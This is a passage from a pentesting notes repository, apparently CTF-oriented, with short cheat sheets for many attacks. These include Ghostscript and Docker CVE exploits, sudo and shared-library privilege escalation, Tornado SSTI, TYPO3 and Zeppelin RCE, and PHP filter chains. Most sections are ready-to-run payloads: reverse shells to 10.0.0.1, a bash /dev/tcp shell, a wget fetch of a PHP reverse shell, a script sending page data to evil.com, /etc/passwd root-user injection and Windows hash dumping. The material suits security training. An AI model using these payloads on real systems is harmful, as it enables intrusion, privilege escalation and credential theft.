$$\write\outfile{Hello-World}$$ 36 | ``` 37 | 38 | ## References 39 | 40 | - [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection) 41 | - [HackTricks](https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection) -------------------------------------------------------------------------------- /docs/exploit/machine-learning/computer-vision/image-manipulation.md: -------------------------------------------------------------------------------- 1 | # Image Manipulation for Machine Learning 2 | 3 | We can update each pixel value to change an image. 4 | 5 | ## Swapping Pixels 6 | 7 | This example updates pixel values at specified positions. 8 | 9 | ```python 10 | import numpy as np 11 | from PIL import Image 12 | 13 | img = Image.open("example.png") 14 | 15 | # Reshape image data to desired size for easy processing 16 | pixels = np.array(img.getdata()) 17 | pixels = np.reshape(pixels, (28, 28)) 18 | 19 | # Update each pixel with desired value for changing image 20 | for i in range(img.size[0]): 21 | for j in range(img.size[1]): 22 | # change pixel value at position (8, 19) 23 | if i == 8 and j == 19: 24 | pixels[i, j] = 255 25 | # change pixel value at position 25th row, 20th column onwards 26 | if i > 25 and j > 20: 27 | pixels[i, j] = np.random.randint(0, 50) 28 | 29 | # Convert numpy array to image 30 | img_updated = Image.fromarray(pixels.astype(np.uint8)) 31 | ``` 32 | 33 | ## References 34 | 35 | - [Kaggle](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=102) -------------------------------------------------------------------------------- /docs/exploit/web/ghostscript.md: -------------------------------------------------------------------------------- 1 | # GhostScript Pentesting 2 | 3 | GhostScriipt is an interpreter for the PostScript language and PDF files. It might be vulnerable to code execution. 4 | 5 | ## Arbitrary Command Execution (CVE-2018-16509) Before v9.24 6 | 7 | Reference: [https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509) 8 | 9 | If target website uses the functionality which allows user to upload image files associated Python's **Pillow (PIL)**, we can execute remote command over **GhostScript** vulnerability (**`-dSAFER`** bypass using **`OutputFile`**). 10 | Create an image file in which contents as below, then upload it. Command will be executed in the target server. 11 | 12 | ```txt 13 | %!PS-Adobe-3.0 EPSF-3.0 14 | %%BoundingBox: -0 -0 100 100 15 | 16 | userdict /setpagedevice undef 17 | save 18 | legal 19 | { null restore } stopped { pop } if 20 | { legal } stopped { pop } if 21 | restore 22 | mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops 23 | ``` 24 | 25 | ## References 26 | 27 | - [SecLists](https://seclists.org/oss-sec/2018/q3/142) -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/tee.md: -------------------------------------------------------------------------------- 1 | # Sudo Tee Privilege Escalation 2 | 3 | The `sudo tee` command might be vulnerable to privilege escalation. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | (root) NOPASSWD: /usr/bin/tee 9 | ``` 10 | 11 | If we can execute **`tee`** command as root, we can escalate to privilege. 12 | 13 | ## Exploitation 14 | 15 | ### 1. Create a New Password for New User 16 | 17 | Assume the new username is "tester". 18 | 19 | ```sh 20 | # -1: MD5 algorithm 21 | # -salt: Use privided salt -> The new username here 22 | openssl passwd -1 -salt "tester" "password123" 23 | 24 | # Output: $1$tester$LvsygQ2GEt7VUJQEqhMLf/ 25 | ``` 26 | 27 | Copy the output password. 28 | 29 | ### 2. Write New Line with Tee 30 | 31 | Paste the password in **`printf`** and overwrite **`/etc/passwd`** using **`tee`** command. 32 | 33 | ```sh 34 | printf 'tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd 35 | ``` 36 | 37 | ### 3. Switch to New User 38 | 39 | Now the new user was created. 40 | We can switch to the new user. 41 | 42 | ```sh 43 | su tester 44 | password: password123 45 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/framework/tornado.md: -------------------------------------------------------------------------------- 1 | # Tornado Pentesting 2 | 3 | Tornado is a Python web server and web application framework. 4 | 5 | ## Server-Side Template Injection (SSTI) 6 | 7 | We can execute arbitrary Python script using the server-site template injection. 8 | First check if the script will be executed as below. 9 | 10 | ```bash 11 | Website by {{ 2*3 }} 12 | {{ 2*3 }} 13 | 14 | # URL parameters 15 | https://example.com/?q={{2*3}} 16 | ``` 17 | 18 | If the website shows **`6`** instead of **`2*3`**, we can execute arbitrary code. 19 | Try following payloads. 20 | 21 | ```bash 22 | {% import os %}{{ os.popen("whoami").read() }} 23 | 24 | # Reverse shell. Replace "10.0.0.1" with your own ip 25 | # It requires a listener like `nc -lvnp 4444` in local terminal. 26 | {% import socket,subprocess,os %}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]) }} 27 | ``` 28 | 29 | ## References 30 | 31 | - [ajinabraham](https://ajinabraham.com/blog/server-side-template-injection-in-tornado) -------------------------------------------------------------------------------- /docs/exploit/web/business-logic-attack.md: -------------------------------------------------------------------------------- 1 | # Business Logic Attack 2 | 3 | Business Logic is the part of the program that encodes the real-world business rules that determine how data can be created, stored, and changed. 4 | 5 | ## Change Request Params to Unexpected Values 6 | 7 | ```sh 8 | productId=-1 9 | productId=a 10 | productId= # empty value 11 | 12 | price=-1000 13 | price=1000- 14 | price=%1000 15 | price=%-1000 16 | ``` 17 | 18 | ## Exploit Broken Two-Factor 19 | 20 | ### Brute force a MFA Code 21 | 22 | ```html 23 | POST /login HTTP/1.1 24 | Cookie: verify=victim 25 | ... 26 | 27 | 28 | mfa-code=1111 29 | ``` 30 | 31 | ## Loop Back with 2,147,483,647 32 | 33 | No contents yet. 34 | 35 | ## Register with Too Long-Length Email Address 36 | 37 | ```html 38 | POST /register HTTP/1.1 39 | ... 40 | 41 | username=attacker&password=pass1&email=aaaaaaaaaaaaa...aa@vulnerable.com.attacker.com 42 | ``` 43 | 44 | ## Remove the Specific POST Params 45 | 46 | ```html 47 | POST /change-password HTTP/1.1 48 | ... 49 | 50 | 51 | username=admin&new-password-1=newpass&new-password-2=newpass 52 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/client-server-side-filter-bypass.md: -------------------------------------------------------------------------------- 1 | # Client/Server Side Filter Bypass 2 | 3 | If the website uses a filter for validation, we might be able to bypass it by disabling the filter. We can easily do that with Burp Suite's Intercept. 4 | 5 | ## 1. Disable Filter 6 | 7 | ### Disable Client-Side (JS) Filter 8 | 9 | 1. In **Burp Suite**, go to **Proxy** tab and click **Options**. 10 | 2. Navigate to **Intercept Client Requests** section, then click on the top line (**File extension**...) then click **Edit**. 11 | 3. The popup will open. 12 | 4. In the popup, find and remove `|^js$` in **Match condition**, then save the filter. 13 | 14 | ### Disable Server-Side Filter 15 | 16 | 1. In **Burp Suite**, go to **Proxy** tab and click **Options**. 17 | 2. Navigate to **Intercept Server Requests** section and check **Intercept responses based on...**. 18 | 19 | ## 2. Drop Filter 20 | 21 | After setting up as above, we might be able to bypass filter by intercepting requests and drop the filter as the following actions. 22 | 23 | 1. Turn the intercept on. 24 | 2. On browser, press Ctrl+F5 (hard refresh) to reload the page. 25 | 3. If you found the filtering file (.js), drop it. -------------------------------------------------------------------------------- /docs/exploit/web/ssti.md: -------------------------------------------------------------------------------- 1 | # SSTI (Server-Side Template Injection) 2 | 3 | ## Automation 4 | 5 | - [SSTImap](https://github.com/vladko312/SSTImap) 6 | 7 | ```sh 8 | ./sstimap.py -u https://example.com/?name=test 9 | ./sstimap.py -u https://example.com -m POST -d "name=test" 10 | ``` 11 | 12 | ## Identify the Template Engine/Framework/Language 13 | 14 | |Payload|Template Engine/Framework/Language| 15 | |:---|:---| 16 | |`a{*comment*}b`|Smarty| 17 | |`#{ 2*3 }`|Pug, Spring| 18 | |`*{ 2*3 }`|Spring| 19 | |`${"z".join("ab")}`|Mako, ???| 20 | |`{{ '7'*7 }}`|Angular, Django, Flask, Go, Jinja2, Tornado, Twig, ???| 21 | |`{{:2*3}}`|JsRender| 22 | |`{% debug %}`|Django| 23 | |`<%= 7*7 %>`|ERB (Embedded Ruby)| 24 | 25 | ## SSTI for Each Framework 26 | 27 | Please see each article for details about SSTI. 28 | 29 | - [Angular](framework/angular.md) 30 | - [Django](framework/django.md) 31 | - [Flask/Jinja2](framework/flask-jinja2.md) 32 | - [ERB (Embedded Ruby)](erb-ssti.md) 33 | - [Go](go-ssti.md) 34 | - [JsRender](template-engine/jsrender-template-injection.md) 35 | - [Pug](template-engine/pug.md) 36 | - [Spring](framework/spring.md) 37 | - [Tornado](framework/tornado.md) -------------------------------------------------------------------------------- /docs/exploit/container/docker/moby-docker-engine-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | # Moby Docker Engine Privilege Escalation 2 | 3 | ## Directory Traversal & Arbitrary Command Execution ([CVE-2021-41091](https://www.suse.com/security/cve/CVE-2021-41091.html) ) 4 | 5 | ### 1. Find Docker Container Directory 6 | 7 | First off, find the directory which the docker container mounted 8 | 9 | ```bash 10 | findmnt 11 | 12 | # Results e.g. 13 | /var/lib/docker/overlay2/abcdef...xyz/merged 14 | ``` 15 | 16 | Assume the directory above found, we can investigate in the directory. 17 | 18 | ```bash 19 | ls -la /var/lib/docker/overlay2/abcdef...xyz/merged/ 20 | ``` 21 | 22 | ### 2. Prepare SUID Binary in Container 23 | 24 | If we can be root in the docker container, set uid arbitrary binary as below. Please note that we need to do that in the container, not the real host. 25 | 26 | ```bash 27 | chmod u+s /bin/bash 28 | ``` 29 | 30 | ### 3. Execute the SUID Binary in Real Host 31 | 32 | Back to the real host machine again, execute the binary which we set uid to privilege escalation. 33 | 34 | ```bash 35 | /var/lib/docker/voerlay2/abdef...xyz/merged/bin/bash -p 36 | ``` 37 | 38 | We should get a root shell. -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/shared-library-hijacking.md: -------------------------------------------------------------------------------- 1 | # Shared Library Hijacking 2 | 3 | ## Investigation 4 | 5 | When we find the binary file as setuid or sudo command, check the strings of the binary file. 6 | 7 | ```bash 8 | strings ./example 9 | strace ./example 10 | gdb ./example 11 | 12 | ... 13 | foo.so 14 | ... 15 | ``` 16 | 17 | If the binary file uses a shared library (e.g. **`foo.so`**) and this library can be modified, we can update it and get a root shell. 18 | 19 | ```bash 20 | find / -type f -name "foo.so" 2>/dev/null 21 | ls -al /path/to/foo.so 22 | 23 | drwxrwxrwx 1 user user 64 Dec 15 09:13 foo.so 24 | ``` 25 | 26 | ## Exploitation 27 | 28 | Create **"foo.c"**. 29 | 30 | ```c 31 | #include 32 | #include 33 | 34 | void foo() { 35 | setuid(0); 36 | setgid(0); 37 | system("/bin/bash -i"); 38 | } 39 | ``` 40 | 41 | Then compile it to shared object. 42 | 43 | ```bash 44 | gcc -shared -fPIC -nostartfiles -o foo.so foo.c 45 | ``` 46 | 47 | Put the shared file to **`/path/to/foo.so`** . 48 | Now run the binary. 49 | 50 | ```bash 51 | ./example 52 | # or 53 | sudo ./example 54 | ``` 55 | 56 | We should get a root shell. -------------------------------------------------------------------------------- /docs/exploit/network/tool/tshark.md: -------------------------------------------------------------------------------- 1 | # Tshark Cheat Sheet 2 | 3 | Tshark is a terminal-oriented version of Wireshark. It's a network protocol analyzer. 4 | 5 | ## Basic Capture 6 | 7 | ```sh 8 | tshark 9 | 10 | # -i: interface (default: eth0) 11 | tshark -i tun0 12 | # --list-interface: List interfaces available 13 | tshark --list-interfaces 14 | 15 | # -r: Use a captured file 16 | tshark -r example.pcapng 17 | 18 | # Number of packets 19 | tshark -r example.pcapng | wc -l 20 | 21 | # Hex dump 22 | tshark -r example.pcapng --hexdump all 23 | ``` 24 | 25 | ## Filtering 26 | 27 | We can filter packets using `-Y` option. 28 | 29 | ### Protocols 30 | 31 | ```bash 32 | # HTTP 33 | tshark -Y 'http' 34 | 35 | # ICMP 36 | tshark -Y 'icmp' 37 | 38 | # TCP/UDP 39 | tshark -Y 'tcp' 40 | tshark -Y 'udp' 41 | ``` 42 | 43 | ### IP Address 44 | 45 | ```bash 46 | tshark -Y 'ip.addr == 127.0.0.1' 47 | 48 | # Source address 49 | tshark -Y 'ip.src == 127.0.0.1' 50 | 51 | # Destination address 52 | tshark -Y 'ip.dst == 127.0.0.1' 53 | ``` 54 | 55 | ## Dump Transferred Data 56 | 57 | ```bash 58 | tshark -r example.pcapng -T fields -e data -Y "ip.src == 10.0.0.2 and ip.dst == 10.0.0.3" > data.txt 59 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/web-server-misconfiguration.md: -------------------------------------------------------------------------------- 1 | # Web Server Security Misconfiguration 2 | 3 | If web servers may be configured improperly, we have to reconfigure them properly. This page gives you checklists for likely misconfiguration. 4 | 5 | ## Checklist 6 | 7 | - The admin page allows **non-admin** users to access. 8 | - **Directory listing** is enabled. 9 | - Test environment is public. 10 | - Default username and password. 11 | - Admin’s password is easy to guess e.g. **"admin"**, **"password123"**, etc. 12 | - The software is **out of date** or **vulnerable** version. 13 | - Attacker-friendly error messages are displayed e.g. it reveals the software version. 14 | - A **cloud service provider (CSP)** has default sharing permissions. 15 | - Unsecure `http` protocol is used rather than `https`. 16 | 17 | ## Check CSP (Content-Security-Policy) 18 | 19 | We can check if the CSP is vulnerable or not using online tools as below. 20 | 21 | - [CSP Evaluator](https://csp-evaluator.withgoogle.com/) 22 | 23 | ## Security Headers 24 | 25 | - [https://securityheaders.com/](https://securityheaders.com/) 26 | 27 | ## References 28 | 29 | - [OWASP](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/) -------------------------------------------------------------------------------- /docs/exploit/web/apache-zeppelin.md: -------------------------------------------------------------------------------- 1 | # Apache Zeppelin Pentesting 2 | 3 | Apache Zeppelin is a web-based notebook that enables data-driven. It uses 8080 port by default. 4 | 5 | ## Authentication Config File 6 | 7 | ```bash 8 | /shiro.ini 9 | ``` 10 | 11 | ## Default Credentials 12 | 13 | ```bash 14 | admin:admin 15 | admin:password1 16 | user1:password2 17 | user1:role1 18 | user1:role2 19 | user2:password3 20 | user2:role3 21 | user3:password4 22 | user3:role2 23 | ``` 24 | 25 | ## RCE in Notebooks 26 | 27 | We can execute remote OS command in notebooks. Access to the notebook and execute the following scripts. 28 | 29 | ```python 30 | %python 31 | 32 | import os 33 | 34 | # Configurations 35 | os.system('cat conf/shiro.ini') 36 | ``` 37 | 38 | ### Reverse Shell 39 | 40 | Before executing the following script, we need to start a listener such as **`nc -lvnp 4444`** in local machine. 41 | 42 | ```python 43 | %python 44 | 45 | import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash") 46 | ``` 47 | 48 | ## References 49 | 50 | - [Apache Zeppelin Docs](https://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html) -------------------------------------------------------------------------------- /docs/exploit/reconnaissance/osint/imint-geoint.md: -------------------------------------------------------------------------------- 1 | # IMINT (Image Intelligence) and GEOINT (Geospatial Intelligence) 2 | 3 | IMINT and GEOINT are types of OSINT to reveal desired information from analyzing images. 4 | 5 | ## Basic Investigation 6 | 7 | ```sh 8 | open example.jpg 9 | exiftool example.jpg 10 | ``` 11 | 12 | ## Gather Information From Search Engine 13 | 14 | Search the keyword which is found in the image. 15 | 16 | - Name 17 | - Location (country, city, etc.) 18 | - When does it open 19 | 20 | ## Reverse Image Search 21 | 22 | Upload the image in each search engine. 23 | 24 | - **[Bing Images](https://www.bing.com/?scope=images)** 25 | 26 | - **[Google Images](https://www.google.com/imghp)** 27 | 28 | Click the “Search by image” icon and upload the image. 29 | 30 | - **[Yandex Images](http://yandex.com/images)** 31 | 32 | ## Video (mp4) Geolocation 33 | 34 | FFmpeg extracts every single frame from a video. 35 | 36 | ```bash 37 | # -i: input file 38 | # %06d: followed by six digits e.g. img_000001.png, img_000002.png, etc. 39 | # -hide_banner: hide unnecessary text. 40 | # -r: frame rate (e.g. 1 frame per second) 41 | ffmpeg -i example.mp4 -r 1 img_%06d.png -hide_banner 42 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/vim.md: -------------------------------------------------------------------------------- 1 | # Sudo Vim Privilege Escalation 2 | 3 | The `sudo vim` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```sh 8 | sudo -l 9 | 10 | (ALL) NOPASSWD: vim example.txt 11 | ``` 12 | 13 | If we can execute **"vim"** command as root, we can execute the shell command in the vim editor. 14 | 15 | ## Exploitation 16 | 17 | Simply run **"vim"** command as root. 18 | 19 | ```sh 20 | sudo vim example.txt 21 | ``` 22 | 23 | In Vim editor, we can run shell commands as root. 24 | 25 | ```sh 26 | :r!whoami 27 | ``` 28 | 29 | ### Options 30 | 31 | ```sh 32 | # Read environment variables 33 | # - We can list them by entering [tab] key after `:echo $`. 34 | :echo $PATH 35 | 36 | # Read another file 37 | :read /etc/passwd 38 | 39 | # Edit another file 40 | :edit /etc/passwd 41 | 42 | # Execute Python script 43 | :py import os;os.execl("/bin/sh", "sh", "-c", "reset; exec sh") 44 | :py3 import os;os.execl("/bin/sh", "sh", "-c", "reset; exec sh") 45 | # Enumeration 46 | :py3 import os;print(os.listdir("/")) 47 | # Write file from another file 48 | :py3 open("/tmp/new_file", "wb").write(open("/tmp/original_file", "rb").read()) 49 | ``` -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/dumping-windows-password-hashes.md: -------------------------------------------------------------------------------- 1 | # Dumping Windows Password Hashes 2 | 3 | Using Impacket's SecretsDump, we can dump the Windows password hashes. 4 | 5 | ## Commands 6 | 7 | ### Using Credentials 8 | 9 | ```sh 10 | impacket-secretsdump example.local/username:password@ 11 | 12 | # -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys). 13 | impacket-secretsdump -just-dc example.local/username:password@ 14 | # -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only). 15 | impacket-secretsdump -just-dc-ntlm example.local/username:password@ 16 | ``` 17 | 18 | ### Using NTDS file or Hives 19 | 20 | ```sh 21 | # -ntds: NTDS.DIT file to parse 22 | # -system: SYSTEM hive to parse 23 | impacket-secretsdump -ntds ntds.dit -system system LOCAL 24 | 25 | # -sam: SAM hive to parse 26 | # -security: SECURITY hive to parse 27 | # -system: SYSTEM hive to parse 28 | impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL 29 | ``` 30 | 31 | After dumping, we can crack them to reveal passwords or use them with **Pass-The-Hash**. 32 | 33 | ## References 34 | 35 | - [](https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/) 36 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/apache-conf.md: -------------------------------------------------------------------------------- 1 | # Apache Conf Privilege Escalation 2 | 3 | ## Investigation 4 | 5 | ```bash 6 | ls -al /etc/apache2 7 | 8 | -rwxrwxrwx 1 root root 7094 NOV 7 2023 apache2.conf 9 | ``` 10 | 11 | If we can modify the apache configuration file, we can update the web owner (www-data) to arbitrary user. 12 | 13 | ## Exploitation 14 | 15 | ### 1. Update Apache.Conf 16 | 17 | First modify “apache.conf” file to change the web user with new one. 18 | 19 | ```bash 20 | # These need to be set in /etc/apache2/envvars 21 | User www-data 22 | Group www-data 23 | ``` 24 | 25 | ### 2. Insert Reverse Shell Script 26 | 27 | In the web directory (e.g. `/var/www/html`), create the script to reverse shell. 28 | Assume the website uses PHP, so we can create “shell.php” in the web root and insert [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) script. 29 | 30 | ### 3. Restart Apache Server 31 | 32 | ### 4. Get a Shell 33 | 34 | We need to start a listener in local terminal. 35 | 36 | ```bash 37 | nc -lvnp 1234 38 | ``` 39 | 40 | Then access to the web page e.g. `https://example.com/shell.php`. 41 | 42 | We should get a shell as the desired user. -------------------------------------------------------------------------------- /docs/exploit/network/protocol/rtsp.md: -------------------------------------------------------------------------------- 1 | # RTSP (Real Time Streaming Protocol) Pentesting 2 | 3 | RTSP is an application level network protocol designed for multiplexing and packetizing multimedia transport streams over a suitable transport protocol. Default ports are 554, 8554. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script rtsp-* -p 554,8554 9 | ``` 10 | 11 | ## Default Credential 12 | 13 | ```bash 14 | admin:admin 15 | admin:12345 16 | ``` 17 | 18 | ## Watch RTSP Stream using VLC Media Player 19 | 20 | Reference: [https://www.youtube.com/watch?v=ksUylvdJQDQ](https://www.youtube.com/watch?v=ksUylvdJQDQ) 21 | 22 | We might be able to watch **RTSP stream** using a media player such as **VLC**. Here is the example for VLC. 23 | First off, if we don’t have the VLC Media Player, we need to install it by the following command. 24 | 25 | ```bash 26 | sudp apt install vlc 27 | ``` 28 | 29 | Then open **VLC**, follow these steps: 30 | 31 | 1. Click on **Open Network Stream...** in **Media** menu. 32 | 2. In another dialog, enter the network URL like **`rtsp://10.0.0.2:554`**. Replace **`10.0.0.2`** with target ip address. 33 | 3. Enter username and password in login screen. 34 | 35 | Now we might be able to watch RTSP stream. -------------------------------------------------------------------------------- /docs/exploit/web/broken-link-hijacking.md: -------------------------------------------------------------------------------- 1 | # Broken Link Hijacking 2 | 3 | Broken Link Hijacking is an attack method that attacker can execute arbitrary code by hijacking link e.g. JavaScript file if target website is loading file with broken link. 4 | 5 | ## Investigation 6 | 7 | Assume that target website loads external JavaScript file in `example.com` no longer exists as below. 8 | 9 | ```bash 10 | 11 | ``` 12 | 13 | If attacker bought this domain, he can host arbitrary JavaScript file named **`script.js`** in the `example.com` root directory. 14 | 15 | ## Exploitation Examples 16 | 17 | Attacker can write arbitrary code for compromising users in **`script.js`** as example above. 18 | For example, if target website includes sensitive information of authenticated user in the page where the broken link is loaded, attackers can send these information to their owned server. 19 | 20 | ```jsx 21 | // script.js 22 | var secret = document.getElementById('userinfo'); 23 | var request = new XMLHttpRequest(); 24 | request.open('GET', 'http://evil.com/?data=' + secret, false); 25 | request.send(); 26 | ``` 27 | 28 | ## References 29 | 30 | - [EdOverflow](https://edoverflow.com/2017/broken-link-hijacking/) -------------------------------------------------------------------------------- /docs/exploit/web/cms/typo3.md: -------------------------------------------------------------------------------- 1 | # TYPO3 Pentesting 2 | 3 | TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS. 4 | 5 | ## Directory Discovery 6 | 7 | ```txt 8 | /fileadmin/ 9 | /typo3/ 10 | /typo3conf/ 11 | /typo3temp/ 12 | ``` 13 | 14 | ## Default Credentials 15 | 16 | ```txt 17 | admin: 18 | ``` 19 | 20 | ## Reverse Shell (Admin Credential Required) 21 | 22 | First, to check and edit the configuration of the uploaded file extension, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”. 23 | Update the configuration if necessary. For example, remove “php[1-9]?” 24 | 25 | ```txt 26 | \.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$ 27 | ``` 28 | 29 | Next, prepare the payload for reverse shell named “shell.php”. 30 | 31 | ```sh 32 | wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php 33 | ``` 34 | 35 | Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin. 36 | Now you need to open listener for getting the shell. 37 | 38 | ```sh 39 | nc -lvnp 4444 40 | ``` 41 | 42 | Then access to “/fileadmin/shell.php”. You should get the shell. -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/updated-motd.md: -------------------------------------------------------------------------------- 1 | # Update-Motd Privilege Escalation 2 | 3 | `/etc/update-motd.d/` is used to generate the dynamic message of the day (MOTD) that is displayed to users when they log in to the system. If we can modify files listed in the directory, we can inject malicious script to escalate privileges. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | ls -al /etc/update-motd.d/ 9 | ``` 10 | 11 | If we have permission to modify files in this directory, we can inject arbitrary code and execute when logging in. 12 | 13 | ## Exploitation 14 | 15 | Run the following code to copy bash binary and give **`suid`** to this file. 16 | Replace **``** with your current user name. 17 | 18 | ```bash 19 | echo "cp /bin/bash /home//bash && chmod u+s /home//bash" >> /etc/update-motd.d/00-header 20 | ``` 21 | 22 | After that, log out and log in again with SSH. The above script should be executed. 23 | Now execute the following command under **`/home/`**. 24 | 25 | ```bash 26 | ./bash -p 27 | ``` 28 | 29 | We should get a root shell. 30 | 31 | ## References 32 | 33 | - [StackExchange](https://security.stackexchange.com/questions/234859/inject-update-motd-d-00-header-to-run-a-script-on-ssh-login) -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/clamav.md: -------------------------------------------------------------------------------- 1 | # Sudo ClamAV Privilege Escalation 2 | 3 | The `sudo clamscan` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | If we can execute **“clamscan”** command as root as below, 8 | 9 | ```bash 10 | sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results 11 | ``` 12 | 13 | we can read sensitive files by applying the custom yara rule. 14 | 15 | ## Exploitation 16 | 17 | ### 1. Create a Yara Rule 18 | 19 | First off, check the location in which the yara file can be created. 20 | 21 | ```bash 22 | find / -name "clam*" 2>/dev/null 23 | ``` 24 | 25 | For instance, assume we can create the yara file under **/var/lib/clamav/**. 26 | Create the yara rule in there. 27 | Assume we want to read /etc/shadow, so specify the string **“root”** because the /etc/shadow contains “root” user name. 28 | 29 | ```bash 30 | # /var/lib/clamav/test.yara 31 | rule test 32 | { 33 | strings: 34 | $string = "root" 35 | conditions: 36 | $string 37 | } 38 | ``` 39 | 40 | ### 2. Execute ClamScan 41 | 42 | Now execute **"clamscan"** as root. 43 | 44 | ```bash 45 | sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results 46 | ``` 47 | 48 | We can see **/etc/shadow** under **/tmp/results**. -------------------------------------------------------------------------------- /docs/exploit/network/tool/convert-putty-key-to-openssh-key.md: -------------------------------------------------------------------------------- 1 | # Convert PuTTY Key to OpenSSH Key 2 | 3 | ## Install PuTTYgen 4 | 5 | If you don’t have **`putty-tools`** on **Linux**, install it at first. 6 | 7 | ```bash 8 | # Install in Linux 9 | sudo apt install putty-tools 10 | ``` 11 | 12 | If you use **`puttygen`** on **Windows**, install the **PuTTYgen** in the official page. 13 | 14 | ## Generate Key Pair 15 | 16 | ```bash 17 | # -t: key type 18 | # -b: number of bits 19 | # -C: key comment 20 | # -o: output file 21 | puttygen -t rsa -b 2084 -C "user@example.com" -o keyfile.ppk 22 | ``` 23 | 24 | ### PuTTY to SSH Key 25 | 26 | If you use **`puttygen`** on **Linux**, run the following command to convert PuTTY key to **OpenSSH** keys (private/public). 27 | 28 | ```bash 29 | # SSH private key 30 | puttygen keyfile.ppk -O private-openssh -o id_rsa 31 | 32 | # SSH public key 33 | puttygen keyfile.ppk -O public-openssh -o id_rsa.pub 34 | ``` 35 | 36 | If you use **`puttygen`** on **Windows**, follow these steps: 37 | 38 | 1. Open **PuTTYgen**. 39 | 2. Click on **Conversions → Import key** at the top menu. Then upload the PuTTY key file (**`.ppk`**). 40 | 3. After uploading, click on **Conversions → Export OpenSSH key**. 41 | 4. The **OpenSSH** private key will be downloaded. -------------------------------------------------------------------------------- /docs/exploit/windows/wsl.md: -------------------------------------------------------------------------------- 1 | # WSL Pentesting 2 | 3 | WSL (Windows Subsystem for Linux) is a feature of Windows that allows developers to run a Linux environment without the need for a separate virtual machine or dual booting. 4 | 5 | ## Enumeration 6 | 7 | ### Interesting Information 8 | 9 | Run the following commands in WSL. 10 | 11 | ```bash 12 | # Configuration 13 | cat /etc/wsl.conf 14 | 15 | # IP address of host machine 16 | ip route | grep default 17 | 18 | # IP address of WSL itself 19 | ip a 20 | # or 21 | hostname -I 22 | ``` 23 | 24 | ## Escape WSL to Windows Host Machine 25 | 26 | If we’are currently on WSL machine, we can access to the host Windows machine as below. 27 | 28 | ```bash 29 | cd /mnt/c/ 30 | ``` 31 | 32 | If **`/mnt/c/`** is empty, we need to mount the folder by running the following command. 33 | 34 | ```bash 35 | cd / 36 | 37 | # -t: Limit the set of filesystem types 38 | # drvfs: A plugin for WSL 39 | # C: : Specify the Windows root 40 | mount -t drvfs C: /mnt/c 41 | ``` 42 | 43 | ## Switch Default User to Root 44 | 45 | The following command changes the default user to `root` when booting WSL. This could potentially be used to escalate privileges. 46 | Run it on PowerShell: 47 | 48 | ```powershell 49 | wsl config --default-user root 50 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/php-filters-chain.md: -------------------------------------------------------------------------------- 1 | # PHP Filters Chain 2 | 3 | ## Exploitation 4 | 5 | [PHP Filter Chain Generator](https://github.com/synacktiv/php_filter_chain_generator) is available so we can use it. 6 | 7 | ```bash 8 | python3 php_filter_chain_generator.py --chain '' 9 | ``` 10 | 11 | We only have to do is paste the above generated payload to **`/?page=`**. 12 | 13 | ### Reverse Shell 14 | 15 | First create a shell script named **"revshell"** in local machine. 16 | 17 | ```bash 18 | bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 19 | ``` 20 | 21 | Then create a chain using a generator. 22 | Replace the ip address with your own. 23 | 24 | ```bash 25 | # `` is a shorthand for `` 26 | python3 php_filter_chain_generator.py --chain '' 27 | ``` 28 | 29 | We need to start a web server that hosts the shell script, and also start a listener for receiving the reverse connection. 30 | 31 | ```bash 32 | # terminal 1 33 | sudo python3 -m http.server 80 34 | 35 | # terminal 2 36 | nc -lvnp 4444 37 | ``` 38 | 39 | Now access to **`/?page=`**. We can get a shell. 40 | 41 | ## References 42 | 43 | - [Synacktiv](https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it.html) -------------------------------------------------------------------------------- /docs/exploit/archives/zip-unzip.md: -------------------------------------------------------------------------------- 1 | # Zip & 